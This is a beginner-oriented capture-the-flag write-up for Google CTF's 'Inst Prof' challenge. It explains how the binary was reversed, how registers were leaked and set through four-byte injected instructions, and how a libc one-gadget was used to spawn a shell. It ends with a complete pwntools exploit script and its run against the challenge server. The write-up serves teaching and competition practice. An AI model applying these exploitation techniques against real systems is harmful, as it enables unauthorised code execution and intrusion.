TL;DR We managed to write arbitrary values into registers/memory and spawned a shell using a single magic gadget from libc. πŸ‘πŸ»

This write-up is aimed at beginners and tries to explain thoroughly the steps we followed to solve the challenge. We assume the reader knows the very basics of C programming, buffer overflows, 32 vs 64-bit assembly. Our proofs of concept use the fabulous pwntools, a framework for writing and debugging exploits with ease.

1. First steps

Let’s start. For this challenge, we were given a 64-bit ELF named inst_prof

$ file ./inst_prof
./inst_prof: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=61e50b540c3c8e7bcef3cb73f3ad2a10c2589089, not stripped

which, luckily, is not stripped: symbols information (like names of functions and global variables) was not removed from the binary. Use nm

$ nm ./inst_prof
[...]
0000000000000860 T main
0000000000000a20 T make_page_executable
                 U mmap@@GLIBC_2.2.5
                 U mprotect@@GLIBC_2.2.5
                 U munmap@@GLIBC_2.2.5
0000000000000a50 T read_byte
                 U read@@GLIBC_2.2.5
0000000000000ab0 T read_inst
0000000000000a80 T read_n
[...]

to list all symbols in an object file. Before analyzing the binary, it’s always a good idea to check which security features it uses. This can be easily done with checksec (from pwntools)

$ pwn checksec ./inst_prof
[*] '/home/ubuntu/inst_prof'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      PIE enabled

which reports the binary is both NX and PIE enabled. What does this mean? The NX bit is a feature used to mark certain areas of memory (e.g. the stack) as non-executable, preventing code inserted into them from being executed: for example, if one manages to put a shellcode on the stack and jump into it by overwriting a return address, the program will abruptly terminate because of a segmentation fault. In addition, since the binary is position-independent, its runtime location in virtual memory is randomized (assuming ASLR enabled on the machine), preventing an attacker who is able to control the instruction pointer from reliably jumping to useful memory locations like the .text section or the GOT table.

To get an initial idea of what the program does, we tried to play a bit with it:

$ ./inst_prof
initializing prof...ready
1234
Segmentation fault (core dumped)

Wait, what?

$ ./inst_prof
initializing prof...ready
asdf
Illegal instruction (core dumped)

Oh well… time to fire up our disassemblers!

2. From assembly back to C

In this section we discuss how the program works, presenting both its disassembly and equivalent C code. Recall that the binary is 64-bit and uses its specific calling convention, in which the first arguments are passed in registers rdi, rsi, rdx, rcx. The function main() is disassembled as

and equivalent to the C code

int main(int argc, const char *argv[], const char *envp[]) {
    if (write(1, "initializing prof...", 0x14) == 0x14) {
        sleep(5);
        alarm(0x1E);
        if (write(1, "ready\n", 6) == 6) {
            while (1) {
                do_test();
            }
        }
    }
    exit(0);
}

which makes clear that this function just repeatedly calls do_test() until SIGALRM is raised (after 0x1E seconds). The function do_test() is disassembled as

and equivalent to the C code

void do_test() {
    char *page_addr = alloc_page();
    memcpy(page_addr, template, sizeof(template));

    read_inst(page_addr + 5);
    make_page_executable(page_addr);

    uint64_t start_time = rdtsc();
    ((void (*)(void))page_addr)();
    uint64_t elapsed_time = rdtsc() - start_time;

    if (write(1, &elapsed_time, 8) != 8) {
        exit(0);
    }
    free_page(page_addr);
}

which uses the global variable template defined as

/*
   0:   b9 00 10 00 00          mov    ecx,0x1000
   5:   90                      nop
   6:   90                      nop
   7:   90                      nop
   8:   90                      nop
   9:   83 e9 01                sub    ecx,0x1
   c:   75 f7                   jne    0x5
   e:   c3                      ret
*/
char template[] = { 0xB9, 0x00, 0x10, 0x00, 0x00, 0x90, 0x90, 0x90, 0x90, 0x83, 0xE9, 0x01, 0x75, 0xF7, 0xC3 };

The remaining functions are quite straightforward to reverse and can be summarized as:

Function Description
void * alloc_page() maps a new page into memory with mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) (we used this little script to retrieve back names of header file constants)
void read_inst(void *addr) calls read_n(addr, 4)
void read_n(void *addr, int n) calls repeatedly read_byte() for reading n bytes into *addr
char read_byte() reads and returns a character from the user via stdin
void make_page_executable(void *page_addr) changes the access protections of a page with mprotect(page_addr, 0x1000, PROT_READ|PROT_EXEC)
void free_page(void *page_addr) unmaps a page using munmap(page_addr, 0x1000)

Remember the description of the challenge? It says β€œPlease help test our new compiler micro-service”. This program just executes in a loop the following steps for 30 seconds:

  • Alloc a zero-filled memory page of 0x1000 bytes
  • Copy to the allocated area the predefined machine instructions contained in template
  • Read four bytes from the user and place them in the memory page, substituting the four NOP placeholders
  • Remove the write permissions from the page and make it executable
  • Execute the code in the page and print the elapsed number of CPU cycles

The challenge and binary name β€œInst Prof” is very likely the short form of β€œInstruction Profiler”. In a nutshell, the program happily executes user instructions provided that they fit in four bytes. What can we do in such a small space?!

3. Some Aha! moments

It turns out we can do quite a lot, as long as we keep in mind that the injected instructions are executed 0x1000 times in a loop. In fact, instructions like sub r14, r15 have cumulative effects when repeated multiple times and should be followed by ret to execute them only once. Consequently, instructions like shl r14, 32 that are already four bytes long can’t be used since there’s no space left to return immediately after. You can use the asm utility from pwntools to easily assemble code on the command line:

$ asm -c amd64 'shl r14, 32'
49c1e620

The following subsections present what we have found out after some time spent debugging the program.

How to: keep a state between executions

Registers r13, r14 and r15 are left unchanged between executions of user instructions and can be used to store data. We call these the β€œstate registers”.

How to: leak the value of any register

Register r12 is used to store the value of the start_time variable, that is the return value of a call to rdtsc(). After the execution of user instructions, the program computes elapsed_time = rdtsc() - start_time = rdtsc() - r12 and prints the result back to the user via stdout. If, through user instructions, we subtract any value x from r12, the program will print to us elapsed_time + x, and since elapsed_time is usually small (at most 2 bytes), we will get a good approximation of x (the four most significant bytes should be correct). To leak the remaining four bytes of x, we can shift it left by 32 bits and leak the value again.

def get_reg(reg):
    instructions = []

    # leak the most significant 32 bits
    instructions.append('sub r12, {reg:}; ret')

    # leak the least significant 32 bits
    for _ in range(32):
        instructions.append('shl {reg:}, 1; ret')
    instructions.append('sub r12, {reg:}; ret')

    output = execute([inst.format(reg=reg) for inst in instructions])
    hi_bits = output[0]  & 0xffffffff00000000
    lo_bits = output[33] & 0xffffffff00000000
    return hi_bits | (lo_bits >> 32)

How to: set state registers to arbitrary values

We can use instructions like mov r14b, <byte> to set the least significative byte of r14, and execute shl r14, 1 multiple times to move the byte in the desired position.

def set_reg(reg, imm, recv=True):
    imm_bytes = []
    while imm:
        imm_bytes.insert(0, imm & 0xff)
        imm >>= 8

    instructions = list()
    instructions.append('xor {reg:}, {reg:}; ret')

    for b in imm_bytes:
        instructions.extend(['shl {reg:}, 1; ret']*8)
        instructions.append('mov {{reg:}}b, 0x{b:02x}; ret'.format(b=b))

    execute([inst.format(reg=reg) for inst in instructions], recv)

How to: read from/write into memory

Since we are able to set r14 and r15 to arbitrary values, we can use:

  • instructions like mov r14, [r15] and mov r14, [rsp+r15] paired with get_reg() to leak any memory location
  • instructions like mov [r15], r14 and mov [rsp+r15], r14 to modify any memory location

4. An educated guess

How can we use the read and write primitives we just found? There exist multiple possibilities to be explored. Probably, one could try to write a shellcode in any writeable section of the binary (e.g. in a page obtained using alloc_page() or in the stack) and reuse the code of make_page_executable() before jumping to it. We decided to spend some minutes to see if we were able to return-to-libc and just reuse existing code. To perform any kind of ret2libc, the attacker usually needs to know both which version of libc is used by the program to exploit and where this library is loaded in memory. The challenge did not provide any information about the libc used by the binary at inst-prof.ctfcompetition.com:1337, but the given executable was compiled on Ubuntu 14.04.3

$ strings ./inst_prof | grep GCC
GCC: (Ubuntu 4.8.4-2ubuntu1~14.04.3) 4.8.4

and the libc supplied to solve another pwnable challenge (β€œAssignment”) was also from Ubuntu 14.04.

$ ./libc-2.19.so
GNU C Library (Ubuntu EGLIBC 2.19-0ubuntu6.11) stable release version 2.19, by Roland McGrath et al.
Copyright (C) 2014 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.
There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A
PARTICULAR PURPOSE.
Compiled by GNU CC version 4.8.4.
[...]

We decided that this guess was worth a shot, since it takes very little time to check it. While one of us started coding the first part of the exploit, the other used vagrant to start a virtual machine with Ubuntu 14.04, which contained a little newer libc (Ubuntu EGLIBC 2.19-0ubuntu6.13) than the one provided. Assuming this setup was similiar enough to the machines which hosted the challenge, we just needed to leak from the program memory an address which pointed to any location of libc. We quickly debugged inst_prof with GDB and pwndbg to inspect the state of stack just before the four bytes of user instructions (NOPs in this case) were executed:

pwndbg> nearpc 3
 β–Ί 0x7ffff7ff7000    mov    ecx, 0x1000
   0x7ffff7ff7005    nop
   0x7ffff7ff7006    nop
   0x7ffff7ff7007    nop
   0x7ffff7ff7008    nop
   0x7ffff7ff7009    sub    ecx, 1
   0x7ffff7ff700c    jne    0x7ffff7ff7005
pwndbg> stack 10
00:0000β”‚ rsp  0x7fffffffe588 β€”β–Έ 0x555555554b18 (do_test+88) β—‚β€” rdtsc
01:0008β”‚      0x7fffffffe590 β—‚β€” 0x1
02:0010β”‚      0x7fffffffe598 β€”β–Έ 0x7ffff7dd4e80 (initial) β—‚β€” 0x0
03:0018β”‚      0x7fffffffe5a0 β—‚β€” 0x0
04:0020β”‚      0x7fffffffe5a8 β€”β–Έ 0x5555555548c9 (_start) β—‚β€” xor    ebp, ebp
05:0028β”‚ rbp  0x7fffffffe5b0 β€”β–Έ 0x7fffffffe5c0 β—‚β€” 0x0
06:0030β”‚      0x7fffffffe5b8 β€”β–Έ 0x5555555548c7 (main+103) β—‚β€” jmp    0x5555555548c0
07:0038β”‚      0x7fffffffe5c0 β—‚β€” 0x0
08:0040β”‚      0x7fffffffe5c8 β€”β–Έ 0x7ffff7a32f45 (__libc_start_main+245) β—‚β€” mov    edi, eax
09:0048β”‚      0x7fffffffe5d0 β—‚β€” 0x0

Looking closely, we can see that [rsp+0x40] contains the libc address of __libc_start_main+245. Using simple arithmetic

pwndbg> vmmap
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
    0x555555554000     0x555555555000 r-xp     1000 0      /home/ubuntu/vbox/prof/inst_prof_patched
    0x555555755000     0x555555756000 r--p     1000 1000   /home/ubuntu/vbox/prof/inst_prof_patched
    0x555555756000     0x555555757000 rw-p     1000 2000   /home/ubuntu/vbox/prof/inst_prof_patched
    0x7ffff7a11000     0x7ffff7bcf000 r-xp   1be000 0      /lib/x86_64-linux-gnu/libc-2.19.so
    0x7ffff7bcf000     0x7ffff7dcf000 ---p   200000 1be000 /lib/x86_64-linux-gnu/libc-2.19.so
    0x7ffff7dcf000     0x7ffff7dd3000 r--p     4000 1be000 /lib/x86_64-linux-gnu/libc-2.19.so
    0x7ffff7dd3000     0x7ffff7dd5000 rw-p     2000 1c2000 /lib/x86_64-linux-gnu/libc-2.19.so
[...]
$ python -c 'print hex(0x7ffff7a32f45-0x7ffff7a11000)'
0x21f45

we can compute the base address of libc by subtracting 0x21f45 from [rsp+0x40]. VoilΓ !

5. Magical gadgets

Once an attacker is able to find the address of libc base, the easiest way to spawn a shell is to use any of the avaiables – wait for it – one-gadget RCE. These gadgets are just sequences of instructions from libc that execute execve("/bin/sh", NULL, NULL) by themselves, provided that some constraints are met. What sorcery is this? They are just part of the implementation of system(). There exists many tools in the wild to find them, for example one_gadget:

$ one_gadget ./libc.so.6
0x4647c execve("/bin/sh", rsp+0x30, environ)
constraints:
  [rsp+0x30] == NULL

0xc56e3 execve("/bin/sh", rsi, r12)
constraints:
  [rsi] == NULL || rsi == NULL
  [r12] == NULL || r12 == NULL

0xc5732 execve("/bin/sh", [rbp-0x48], r12)
constraints:
  [[rbp-0x48]] == NULL || [rbp-0x48] == NULL
  [r12] == NULL || r12 == NULL

0xe81d8 execve("/bin/sh", rsi, [rbp-0xf0])
constraints:
  [rsi] == NULL || rsi == NULL
  [[rbp-0xf0]] == NULL || [rbp-0xf0] == NULL

0xe8fd5 execve("/bin/sh", rsp+0x50, environ)
constraints:
  [rsp+0x50] == NULL

0xe9f2d execve("/bin/sh", rsp+0x70, environ)
constraints:
  [rsp+0x70] == NULL

From the output above we can see that the tool finds six magic gadgets in the provided libc. For instance, the first one can be found at offset 0x4647c from libc base and will execute /bin/sh only if [rsp+0x30] is zero. Let’s just consider the gadgets with the simplest constraints ([rsp+0x30] == NULL, [rsp+0x50] == NULL and [rsp+0x70] == NULL) and check if they are satisfied:

pwndbg> nearpc 3
 β–Ί 0x7ffff7ff7000    mov    ecx, 0x1000
   0x7ffff7ff7005    nop
   0x7ffff7ff7006    nop
   0x7ffff7ff7007    nop
   0x7ffff7ff7008    nop
   0x7ffff7ff7009    sub    ecx, 1
   0x7ffff7ff700c    jne    0x7ffff7ff7005
pwndbg> stack 20
00:0000β”‚ rsp  0x7fffffffe588 β€”β–Έ 0x555555554b18 (do_test+88) β—‚β€” rdtsc
01:0008β”‚      0x7fffffffe590 β—‚β€” 0x1
02:0010β”‚      0x7fffffffe598 β€”β–Έ 0x7ffff7dd4e80 (initial) β—‚β€” 0x0
03:0018β”‚      0x7fffffffe5a0 β—‚β€” 0x0
04:0020β”‚      0x7fffffffe5a8 β€”β–Έ 0x5555555548c9 (_start) β—‚β€” xor    ebp, ebp
05:0028β”‚ rbp  0x7fffffffe5b0 β€”β–Έ 0x7fffffffe5c0 β—‚β€” 0x0
06:0030β”‚      0x7fffffffe5b8 β€”β–Έ 0x5555555548c7 (main+103) β—‚β€” jmp    0x5555555548c0
07:0038β”‚      0x7fffffffe5c0 β—‚β€” 0x0
08:0040β”‚      0x7fffffffe5c8 β€”β–Έ 0x7ffff7a32f45 (__libc_start_main+245) β—‚β€” mov    edi, eax
09:0048β”‚      0x7fffffffe5d0 β—‚β€” 0x0
0a:0050β”‚      0x7fffffffe5d8 β€”β–Έ 0x7fffffffe6a8 β€”β–Έ 0x7fffffffe8b1 β—‚β€” 0x705f74736e692f2e ('./inst_p')
0b:0058β”‚      0x7fffffffe5e0 β—‚β€” 0x100000000
0c:0060β”‚      0x7fffffffe5e8 β€”β–Έ 0x555555554860 (main) β—‚β€” push   rbp
0d:0068β”‚      0x7fffffffe5f0 β—‚β€” 0x0
0e:0070β”‚      0x7fffffffe5f8 β—‚β€” 0x7f6c40ce365df5a7
0f:0078β”‚      0x7fffffffe600 β€”β–Έ 0x5555555548c9 (_start) β—‚β€” xor    ebp, ebp
10:0080β”‚      0x7fffffffe608 β€”β–Έ 0x7fffffffe6a0 β—‚β€” 0x1
11:0088β”‚      0x7fffffffe610 β—‚β€” 0x0
... ↓
13:0098β”‚      0x7fffffffe620 β—‚β€” 0x8093bf31fdfdf5a7

Uhm. Neither [rsp+0x30] nor [rsp+0x50] nor [rsp+0x70] are zero… but this is not a problem since we discovered a way to write arbitrary values into memory. Also, considering the penultimate gadget and noticing that [rsp+0x50-8] is already NULL, we can just push any value to the stack before jumping to that gadget so that rsp will be decreased by 8 and [rsp+0x50] become zero.

6. Summing it all up

The full return-to-guessed-libc exploit takes finally form:

  1. Set r15 to 0x40
  2. Execute mov r14, [rsp+r15], setting r14 to __libc_start_main+245
  3. Set r15 to 0x21f45 and execute sub r14, r15, setting r14 to the base address of libc
  4. Set r15 to 0xe8fd5 and execute add r14, r15, setting r14 to the address of the magic gadget
  5. Execute call r14 to jump to the gadget and satisfy its single constraint

Note that steps 3. and 4. can be merged into a single arithmetic operation. In our PoC, this translates simply to:

conn = remote('inst-prof.ctfcompetition.com', 1337)
conn.recvuntil('initializing prof...ready\n')

# find the address of __libc_start_main+245
set_reg('r15', 0x40)
execute('mov r14, [rsp+r15]')

# calculate the address of the chosen one-gadget and jump to it
libc_start_main_245_offset = 0x21f45
onegadget_offset = 0xe8fd5
set_reg('r15', -libc_start_main_245_offset + onegadget_offset)
execute('add r14, r15')
execute('call r14', recv=False)

conn.interactive()

Let’s hope it works…

$ python2 ./poc.py
[+] Opening connection to inst-prof.ctfcompetition.com on port 1337: Done
[*] Switching to interactive mode
$ id
uid=1337(user) gid=1337(user) groups=1337(user)

Oh my! First try! πŸš€

$ ls
flag.txt
inst_prof
$ cat flag.txt
CTF{0v3r_4ND_0v3r_4ND_0v3r_4ND_0v3r}

7. Closing remarks

Solving β€œInst Prof” took us:

  • ~20 minutes to reverse the binary
  • > 2 hours to find how to read from/write to arbitrary locations and fix a stupid bug in our script
  • < 5 minutes to test the program in Ubuntu 14.04, find a libc address, compute the correct offsets and spawn a shell

Of course, one can ask: β€œwhat if you were wrong and your local setup didn’t match the remote?” The challenge can be solved without any guessing by:

  • leaking from the stack an address pointing to the binary (e.g. _start at [rsp+0x20])
    pwndbg> stack 5
    00:0000β”‚ rsp  0x7fffffffe588 β€”β–Έ 0x555555554b18 (do_test+88) β—‚β€” rdtsc
    01:0008β”‚      0x7fffffffe590 β—‚β€” 0x1
    02:0010β”‚      0x7fffffffe598 β€”β–Έ 0x7ffff7dd4e80 (initial) β—‚β€” 0x0
    03:0018β”‚      0x7fffffffe5a0 β—‚β€” 0x0
    04:0020β”‚      0x7fffffffe5a8 β€”β–Έ 0x5555555548c9 (_start) β—‚β€” xor    ebp, ebp
    
  • computing the base address of the binary by subtracting the appropriate offset from the leaked address
    $ nm ./inst_prof | grep _start
    [...]
    00000000000008c9 T _start
    
  • computing the address of the .got.plt section by adding the appropriate offset to the base address
    $ readelf -S ./inst_prof | grep got.plt
    [23] .got.plt          PROGBITS         0000000000202000  00002000
    
  • leaking from the GOT table the address of any two libc functions, for example write() and mmap()
    pwndbg> telescope 0x555555554000+0x202000
    00:0000β”‚   0x555555756000 (_GLOBAL_OFFSET_TABLE_) β—‚β€” 0x201e08
    01:0008β”‚   0x555555756008 (_GLOBAL_OFFSET_TABLE_+8) β€”β–Έ 0x7ffff7ffe1c8 β€”β–Έ 0x555555554000 (main) β—‚β€” jg     0x555555554047
    02:0010β”‚   0x555555756010 (_GLOBAL_OFFSET_TABLE_+16) β€”β–Έ 0x7ffff7df0670 (_dl_runtime_resolve) β—‚β€” sub    rsp, 0x38
    03:0018β”‚   0x555555756018 (write@got.plt) β€”β–Έ 0x7ffff7b00380 (write) β—‚β€” cmp    dword ptr [rip + 0x2d8ced], 0
    04:0020β”‚   0x555555756020 (mmap@got.plt) β€”β–Έ 0x7ffff7b094f0 (mmap64) β—‚β€” mov    r10, rcx
    05:0028β”‚   0x555555756028 (alarm@got.plt) β€”β–Έ 0x5555555547d6 (alarm@plt+6) β—‚β€” push   2
    06:0030β”‚   0x555555756030 (read@got.plt) β€”β–Έ 0x7ffff7b00320 (read) β—‚β€” cmp    dword ptr [rip + 0x2d8d4d], 0
    07:0038β”‚   0x555555756038 (__libc_start_main@got.plt) β€”β–Έ 0x7ffff7a32e50 (__libc_start_main) β—‚β€” push   r14
    
    $ ./poc.py --leak
    [+] Opening connection to inst-prof.ctfcompetition.com on port 1337: Done
    write_addr 0x7fb680670f70
    mmap_addr 0x7fb68067a0e0
    [*] Closed connection to inst-prof.ctfcompetition.com port 1337
    
  • using libcdb.com or libc-database to identify the libc of the remote server from the leaked addresses
    /opt/libc-database $ ./find write 0x7fb680670f70 mmap 0x7fb68067a0e0
    archive-eglibc (id libc6_2.19-0ubuntu6.11_amd64)
    
  • computing the base address of libc and jumping to one-gadgets as we did before (constraints are no problem since we are able to write into memory)

But, all of this would have taken five minutes more. πŸ˜„

Thanks to Google for the CTF and this little funny challenge which gave us the opportunity to publish this write-up. See you in future competitions!

PoC

#!/usr/bin/env python2
# -*- coding: utf8 -*-
import argparse

from pwn import *
context(arch='amd64', os='linux')

# by Francesco Cagnin aka integeruser and Marco Gasparini aka xire
# of c00kies@venice


def assemble(code):
    bytecode = asm(code)
    assert len(bytecode) <= 4, '"{}" assemble to more than 4 bytes'.format(code)
    return bytecode.ljust(4, asm('ret'))

def execute(instructions, recv=True):
    if type(instructions) == str:
        instructions = [instructions]

    conn.send(''.join(assemble(inst) for inst in instructions))
    if recv:
        return [unpack(conn.recvn(8)) for _ in range(len(instructions))]

################################################################################

def get_reg(reg):
    instructions = []

    # leak the most significant 32 bits
    instructions.append('sub r12, {reg:}; ret')

    # leak the least significant 32 bits
    for _ in range(32):
        instructions.append('shl {reg:}, 1; ret')
    instructions.append('sub r12, {reg:}; ret')

    output = execute([inst.format(reg=reg) for inst in instructions])
    hi_bits = output[0]  & 0xffffffff00000000
    lo_bits = output[33] & 0xffffffff00000000
    return hi_bits | (lo_bits >> 32)

def set_reg(reg, imm, recv=True):
    imm_bytes = []
    while imm:
        imm_bytes.insert(0, imm & 0xff)
        imm >>= 8

    instructions = list()
    instructions.append('xor {reg:}, {reg:}; ret')

    for b in imm_bytes:
        instructions.extend(['shl {reg:}, 1; ret']*8)
        instructions.append('mov {{reg:}}b, 0x{b:02x}; ret'.format(b=b))

    execute([inst.format(reg=reg) for inst in instructions], recv)

################################################################################

def leak_write_mmap_addr():
    global conn
    conn = remote('inst-prof.ctfcompetition.com', 1337)
    conn.recvuntil('initializing prof...ready\n')

    # find the address of _start
    set_reg('r15', 0x20)
    execute('mov r14, [rsp+r15]')

    # calculate the address of the GOT table
    start_offset = 0x8c9
    gotplt_offset = 0x202000
    set_reg('r15', -start_offset + gotplt_offset)
    execute('add r14, r15')

    # leak write() address
    set_reg('r15', 0x18)
    execute('add r14, r15')
    execute('mov r13, [r14]')
    write_addr = get_reg('r13')
    print 'write_addr', hex(write_addr)

    # leak mmap() address
    set_reg('r15', 0x20-0x18)
    execute('add r14, r15')
    execute('mov r13, [r14]')
    mmap_addr = get_reg('r13')
    print 'mmap_addr', hex(mmap_addr)

def main():
    global conn
    conn = remote('inst-prof.ctfcompetition.com', 1337)
    conn.recvuntil('initializing prof...ready\n')

    # find the address of __libc_start_main+245
    set_reg('r15', 0x40)
    execute('mov r14, [rsp+r15]')

    # calculate the address of the chosen one-gadget and jump to it
    libc_start_main_245_offset = 0x21f45
    onegadget_offset = 0xe8fd5
    set_reg('r15', -libc_start_main_245_offset + onegadget_offset)
    execute('add r14, r15')
    execute('call r14', recv=False)

    conn.interactive()


if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument('-l', '--leak', action='store_true')
    args = parser.parse_args()

    if args.leak:
        leak_write_mmap_addr()
    else:
        main()